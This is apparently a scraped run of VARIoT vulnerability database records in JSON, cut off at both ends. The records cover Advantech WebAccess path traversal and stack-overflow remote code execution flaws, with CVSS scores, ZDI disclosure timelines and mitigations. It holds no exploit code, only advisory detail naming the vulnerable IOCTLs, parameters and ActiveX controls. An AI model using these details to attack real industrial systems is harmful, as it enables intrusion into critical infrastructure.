"ZDI_CAN", "id": "ZDI-CAN-10175", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-446", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2020.1646", "trust": 0.6 }, { "db": "NSFOCUS", "id": "48338", "trust": 0.6 }, { "db": "NSFOCUS", "id": "47706", "trust": 0.6 }, { "db": "IVD", "id": "873E9346-13B7-4A0D-BDF2-DBE576B911F3", "trust": 0.2 }, { "db": "IVD", "id": "864D8EE3-E266-42DF-BE35-529416CAB683", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-164646", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2020-12010", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "873e9346-13b7-4a0d-bdf2-dbe576b911f3" }, { "db": "IVD", "id": "864d8ee3-e266-42df-be35-529416cab683" }, { "db": "ZDI", "id": "ZDI-20-448" }, { "db": "ZDI", "id": "ZDI-20-449" }, { "db": "ZDI", "id": "ZDI-20-447" }, { "db": "ZDI", "id": "ZDI-20-450" }, { "db": "ZDI", "id": "ZDI-20-446" }, { "db": "CNVD", "id": "CNVD-2020-29744" }, { "db": "VULHUB", "id": "VHN-164646" }, { "db": "VULMON", "id": "CVE-2020-12010" }, { "db": "JVNDB", "id": "JVNDB-2020-005163" }, { "db": "CNNVD", "id": "CNNVD-202005-309" }, { "db": "NVD", "id": "CVE-2020-12010" } ] }, "id": "VAR-202005-0336", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "873e9346-13b7-4a0d-bdf2-dbe576b911f3" }, { "db": "IVD", "id": "864d8ee3-e266-42df-be35-529416cab683" }, { "db": "CNVD", "id": "CNVD-2020-29744" }, { "db": "VULHUB", "id": "VHN-164646" } ], "trust": 1.63993413 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "873e9346-13b7-4a0d-bdf2-dbe576b911f3" }, { "db": "IVD", "id": "864d8ee3-e266-42df-be35-529416cab683" }, { "db": "CNVD", "id": "CNVD-2020-29744" } ] }, "last_update_date": "2024-11-23T21:59:18.321000Z", "patch": { "_id": null, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.advantech.com/" }, { "title": "Patch for Advantech WebAccess Node path traversal vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/218855" }, { "title": "Advantech WebAccess Node Repair measures for path traversal vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=118656" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-29744" }, { "db": "JVNDB", "id": "JVNDB-2020-005163" }, { "db": "CNNVD", "id": "CNNVD-202005-309" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-22", "trust": 1.9 }, { "problemtype": "CWE-23", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-164646" }, { "db": "JVNDB", "id": "JVNDB-2020-005163" }, { "db": "NVD", "id": "CVE-2020-12010" } ] }, "references": { "_id": null, "data": [ { "trust": 3.2, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12010" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12010" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu93292753/" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/48338" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/47706" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.1646/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/22.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-29744" }, { "db": "VULHUB", "id": "VHN-164646" }, { "db": "VULMON", "id": "CVE-2020-12010" }, { "db": "JVNDB", "id": "JVNDB-2020-005163" }, { "db": "CNNVD", "id": "CNNVD-202005-309" }, { "db": "NVD", "id": "CVE-2020-12010" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "873e9346-13b7-4a0d-bdf2-dbe576b911f3", "ident": null }, { "db": "IVD", "id": "864d8ee3-e266-42df-be35-529416cab683", "ident": null }, { "db": "ZDI", "id": "ZDI-20-448", "ident": null }, { "db": "ZDI", "id": "ZDI-20-449", "ident": null }, { "db": "ZDI", "id": "ZDI-20-447", "ident": null }, { "db": "ZDI", "id": "ZDI-20-450", "ident": null }, { "db": "ZDI", "id": "ZDI-20-446", "ident": null }, { "db": "CNVD", "id": "CNVD-2020-29744", "ident": null }, { "db": "VULHUB", "id": "VHN-164646", "ident": null }, { "db": "VULMON", "id": "CVE-2020-12010", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2020-005163", "ident": null }, { "db": "CNNVD", "id": "CNNVD-202005-309", "ident": null }, { "db": "NVD", "id": "CVE-2020-12010", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "873e9346-13b7-4a0d-bdf2-dbe576b911f3", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "864d8ee3-e266-42df-be35-529416cab683", "ident": null }, { "date": "2020-04-08T00:00:00", "db": "ZDI", "id": "ZDI-20-448", "ident": null }, { "date": "2020-04-08T00:00:00", "db": "ZDI", "id": "ZDI-20-449", "ident": null }, { "date": "2020-04-08T00:00:00", "db": "ZDI", "id": "ZDI-20-447", "ident": null }, { "date": "2020-04-08T00:00:00", "db": "ZDI", "id": "ZDI-20-450", "ident": null }, { "date": "2020-04-08T00:00:00", "db": "ZDI", "id": "ZDI-20-446", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29744", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULHUB", "id": "VHN-164646", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULMON", "id": "CVE-2020-12010", "ident": null }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005163", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-309", "ident": null }, { "date": "2020-05-08T12:15:11.207000", "db": "NVD", "id": "CVE-2020-12010", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2020-04-08T00:00:00", "db": "ZDI", "id": "ZDI-20-448", "ident": null }, { "date": "2020-04-08T00:00:00", "db": "ZDI", "id": "ZDI-20-449", "ident": null }, { "date": "2020-04-08T00:00:00", "db": "ZDI", "id": "ZDI-20-447", "ident": null }, { "date": "2020-04-08T00:00:00", "db": "ZDI", "id": "ZDI-20-450", "ident": null }, { "date": "2020-04-08T00:00:00", "db": "ZDI", "id": "ZDI-20-446", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29744", "ident": null }, { "date": "2021-09-23T00:00:00", "db": "VULHUB", "id": "VHN-164646", "ident": null }, { "date": "2020-05-12T00:00:00", "db": "VULMON", "id": "CVE-2020-12010", "ident": null }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005163", "ident": null }, { "date": "2020-09-02T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-309", "ident": null }, { "date": "2024-11-21T04:59:06.560000", "db": "NVD", "id": "CVE-2020-12010", "ident": null } ] }, "threat_type": { "_id": null, "data": "local", "sources": [ { "db": "CNNVD", "id": "CNNVD-202005-309" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Node Path traversal vulnerability", "sources": [ { "db": "IVD", "id": "873e9346-13b7-4a0d-bdf2-dbe576b911f3" }, { "db": "IVD", "id": "864d8ee3-e266-42df-be35-529416cab683" }, { "db": "CNVD", "id": "CNVD-2020-29744" }, { "db": "CNNVD", "id": "CNNVD-202005-309" } ], "trust": 1.6 }, "type": { "_id": null, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "873e9346-13b7-4a0d-bdf2-dbe576b911f3" }, { "db": "IVD", "id": "864d8ee3-e266-42df-be35-529416cab683" }, { "db": "CNNVD", "id": "CNNVD-202005-309" } ], "trust": 1.0 } }
var-201602-0478
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C7F IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0478", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-154" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-154" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-154", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-154", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-154" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C7F IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-154" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3159", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-154", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-154" } ] }, "id": "VAR-201602-0478", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:52:39.029000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-154" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-154" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-16-154" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-154" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-154" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName/NodeName sprintf Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-154" } ], "trust": 0.7 } }
var-201602-0491
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C83 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-145" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-145" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-145", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-145", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-145" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C83 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-145" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3161", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-145", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-145" } ] }, "id": "VAR-201602-0491", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:59:59.528000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-145" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-145" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-16-145", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-145", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-145", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName/NodeName sprintf Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-145" } ], "trust": 0.7 } }
var-201708-1698
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-533" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-533" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-533", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-533", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-533" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-533" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4088", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-533", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-533" } ] }, "id": "VAR-201708-1698", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:59:57.214000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\BF28239A-3823-40FF-BC02-2DA4D9DBB1EEIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-533" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-533" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-533", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-533", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-533", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess TpMegaJVT getSectionValue createStream Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-533" } ], "trust": 0.7 } }
var-201708-1716
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-528" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-528" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-528", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-528", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-528" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-528" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4103", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-528", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-528" } ] }, "id": "VAR-201708-1716", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:08:03.826000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-528" } ] }, "references": { "_id": null, "data": 